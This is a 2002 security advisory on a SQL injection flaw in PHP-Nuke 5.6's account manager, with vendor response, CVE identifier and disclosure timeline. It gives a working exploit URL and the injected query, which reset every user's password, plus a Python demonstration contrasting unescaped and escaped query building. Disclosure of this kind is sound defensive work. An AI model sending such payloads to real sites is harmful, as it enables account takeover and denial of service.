Public Vulnerability Reports

PHP-Nuke SQL Injection Vulnerability

10.31.02

BACKGROUND

"PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases." More information is available at http://www.phpnuke.org.

DESCRIPTION

PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify the users table at will. Any registered user of the target system can launch this attack by feeding certain unfiltered characters to the account manager module. The attacker can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field, thereby escaping a quote and leaving the SQL query open for injection. The following example modifies every PHP-Nuke user's password to "1".

Exploitation requires that the attacker log on, enter the account manager and determine his or her UID from the page source. If the attacker's UID is 2, he or she can then launch the attack by requesting the following URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

The injected query is constructed as follows:

UPDATE nuke_users
   SET name         = '',
       email        = '',
       femail       = '',
       url          = 'http://',
       pass         = 'xxxxx',
  +--[ bio          = '',
  |    user_avatar  = '',
  |    user_icq     = '',
  |    user_occ     = '',
  |    user_from    = '',
  |    user_intrest = '',
  |    user_sig     = '',
  |    user_aim     = '',
  |    user_yim     = '',
  |    user_msnm    = '',
  +--[ newsletter   = ',
       bio=0,pass=md5(1)/*' WHERE uid='2'

The marked area is treated as a single value stored into bio. The WHERE clause is commented out, leaving an UPDATE statement that sets the password of every row in the table (i.e., every user) to MD5(1).
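To make the mechanism above concrete from the defender's side, the following Python script is an added example (not PHP-Nuke's code) that builds the account-manager UPDATE statement twice, once by pasting the submitted values in verbatim and once with every value escaped, and then interprets each statement with a small lexer implementing the MySQL rules that matter here: a backslash inside a quoted literal makes the next character literal, adjacent quoted literals concatenate, and an unterminated "/*" comment runs to the end of the statement (the behaviour the advisory's example relies on). The column order is taken from the advisory's query; the field values are the URL-decoded ones from the request above; mysql_escape() is a hypothetical stand-in for a driver's escaping routine, and real code should bind parameters rather than escape by hand.

```python
import re

# Column order of the account-manager UPDATE, as shown in the advisory.
COLUMNS = ["name", "email", "femail", "url", "pass", "bio", "user_avatar",
           "user_icq", "user_occ", "user_from", "user_intrest", "user_sig",
           "user_aim", "user_yim", "user_msnm", "newsletter"]

# Field values from the advisory's request, URL-decoded; all others are empty.
SUBMITTED_FIELDS = {"url": "http://", "pass": "xxxxx",
                    "bio": "\\",                       # a single backslash
                    "newsletter": ", bio=0, pass=md5(1)/*"}

def build_update_unescaped(fields, uid):
    """Naive builder: each value is pasted into a quoted literal verbatim,
    which is the defect the advisory describes."""
    sets = ", ".join(f"{c}='{fields.get(c, '')}'" for c in COLUMNS)
    return f"UPDATE nuke_users SET {sets} WHERE uid='{uid}'"

def mysql_escape(value):
    """Double backslashes and escape quotes (hypothetical stand-in for a
    driver's escaping routine; bind parameters in real code)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

def build_update_escaped(fields, uid):
    """Same statement with every value passed through mysql_escape()."""
    sets = ", ".join(f"{c}='{mysql_escape(fields.get(c, ''))}'" for c in COLUMNS)
    return f"UPDATE nuke_users SET {sets} WHERE uid='{mysql_escape(uid)}'"

def lex(sql):
    """Tokenise with the MySQL rules that matter here: backslash escapes the
    next character inside a literal, adjacent literals concatenate, and an
    unterminated '/*' comment swallows the rest of the statement."""
    out, i = [], 0
    while i < len(sql):
        c = sql[i]
        if c.isspace():
            i += 1
        elif c == "'":
            i, lit = i + 1, []
            while i < len(sql) and sql[i] != "'":
                if sql[i] == "\\" and i + 1 < len(sql):
                    i += 1                      # take the escaped character
                lit.append(sql[i])
                i += 1
            if i >= len(sql):
                raise ValueError("unterminated string literal")
            i += 1                              # closing quote
            if out and out[-1][0] == "lit":     # 'a' 'b' is the same as 'ab'
                out[-1] = ("lit", out[-1][1] + "".join(lit))
            else:
                out.append(("lit", "".join(lit)))
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = len(sql) if end < 0 else end + 2
        elif c in ",=":
            out.append(("sym", c))
            i += 1
        else:
            word = re.match(r"(?:(?!/\*)[^\s,='])+", sql[i:]).group()
            out.append(("word", word))
            i += len(word)
    return out

def parse_update(sql):
    """Return (table, [(column, value), ...], where) as the server would read
    the statement. Literal values come back as strings; bare expressions such
    as md5(1) are returned as '<expr ...>'. where is None if the clause is gone."""
    toks = lex(sql)
    if len(toks) < 3 or toks[0] != ("word", "UPDATE") or toks[2] != ("word", "SET"):
        raise ValueError("not an UPDATE ... SET statement")
    table, sets, where, i = toks[1][1], [], None, 3
    while i < len(toks):
        if toks[i] == ("word", "WHERE"):
            where = " ".join(f"'{t}'" if k == "lit" else t for k, t in toks[i + 1:])
            break
        if i + 2 >= len(toks):
            raise ValueError("truncated assignment")
        col, eq, val = toks[i], toks[i + 1], toks[i + 2]
        if col[0] != "word" or eq != ("sym", "="):
            raise ValueError(f"syntax error near {col[1]!r}")
        sets.append((col[1], val[1] if val[0] == "lit" else f"<expr {val[1]}>"))
        i += 3
        if i < len(toks) and toks[i] == ("sym", ","):
            i += 1
    return table, sets, where

if __name__ == "__main__":
    for label, builder in (("unescaped", build_update_unescaped),
                           ("escaped", build_update_escaped)):
        table, sets, where = parse_update(builder(SUBMITTED_FIELDS, "2"))
        print(f"{label}: {len(sets)} assignments to {table}, WHERE = {where!r}")
        for col, val in sets:
            print(f"  {col} = {val!r}")
```

Run as a script, the unescaped statement parses to eight assignments with no WHERE clause: the escaped quote and the adjacent-literal rule fold the span from bio through newsletter into one string, after which "bio=0, pass=md5(1)" is live SQL and the comment removes the row filter. The escaped statement parses to the intended sixteen assignments with "uid = '2'" intact, and the backslash and the comment marker land inside their literals. The same parser, pointed at a query log, gives a cheap detection check: an UPDATE on the users table whose WHERE clause is missing or whose SET list names a column twice is a strong sign of this injection.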

ANALYSIS

Exploitation allows an attacker to compromise any other account on the system, thereby gaining the privileges and identity of the compromised account. The attacker can also corrupt the entire users table, effectively denying service to legitimate users.

DETECTION

iDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in nature, administrators should not test in a production environment.

VENDOR RESPONSE

Francisco Burzi responded:

"PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack...

Latest version is 6.0 and 6.5 under development. Old versions don't have support of any kind; all bugs and security fixes apply in the new versions. So, the solution to this security hole is to update the software from 5.6 to 6.0 version."

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue.

DISCLOSURE TIMELINE

09/17/2002 Issue disclosed to iDEFENSE
09/23/2002 Author notified through submission form
09/23/2002 iDEFENSE clients notified
10/01/2002 iDEFENSE second attempt at PHP-Nuke contact
10/20/2002 iDEFENSE third attempt at PHP-Nuke contact
10/31/2002 Response from Francisco Burzi (nukelite@users.sourceforge.net)
10/31/2002 Coordinated Public Disclosure

CREDIT

kill9 (kill9@hackers.com) is credited with discovering this vulnerability.